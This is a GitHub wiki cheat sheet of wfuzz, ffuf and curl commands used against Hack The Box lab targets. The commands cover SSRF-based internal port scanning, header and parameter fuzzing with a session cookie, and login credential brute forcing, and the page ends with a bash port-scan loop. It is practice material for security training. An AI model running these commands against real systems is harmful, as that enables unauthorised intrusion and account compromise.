-
Notifications
You must be signed in to change notification settings - Fork 14
FUZZ
Alvin Smith edited this page Dec 15, 2023
·
10 revisions
Check Web Enumeration page for directory bruteforce
wfuzz -z help
wfuzz -c -z range,1-65535 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
wfuzz -c -z range,1-65535 --hl 2 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ
# Fuzz host headers
wfuzz -c -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -u http://$IP/admin.php -H "FUZZ: Control_internal_IP" --hh 89chars
# Fuzz parameters
### Fuzzing Custom headers
wfuzz -u 'https://streamio.htb/admin/?FUZZ=' -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -H "Cookie: PHPSESSID=5b81mitco4j6hgiljr9euhqj1c" --hh 1678
### Fuzzing Cookies
wfuzz -u 'https://streamio.htb/admin/?FUZZ=' -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -b "PHPSESSID=5b81mitco4j6hgiljr9euhqj1c" --hh 1678
-d for post data
wfuzz -c -z file,names.txt --hh 7074 -d "username=FUZZ&password=whatev" http://10.129.1.83/login.php
Brute force creds
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.33.144/login.php -d "username=FUZZ&password=FUZ2Z"ffuf -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -u 'https://streamio.htb/admin/?FUZZ=' -b PHPSESSID=5b81mitco4j6hgiljr9euhqj1c -fs 1678#!/bin/bash
for i in {0..65535}; do
res=$(curl -s http://10.129.1.117:60000/url.php?path=http://localhost:${i});
len=$(echo $res | wc -w);
if [ "$len" -gt "0" ]; then
echo -n "${i}: ";
echo $res | tr -d "\r" | head -1 | cut -c-100;
fi;
done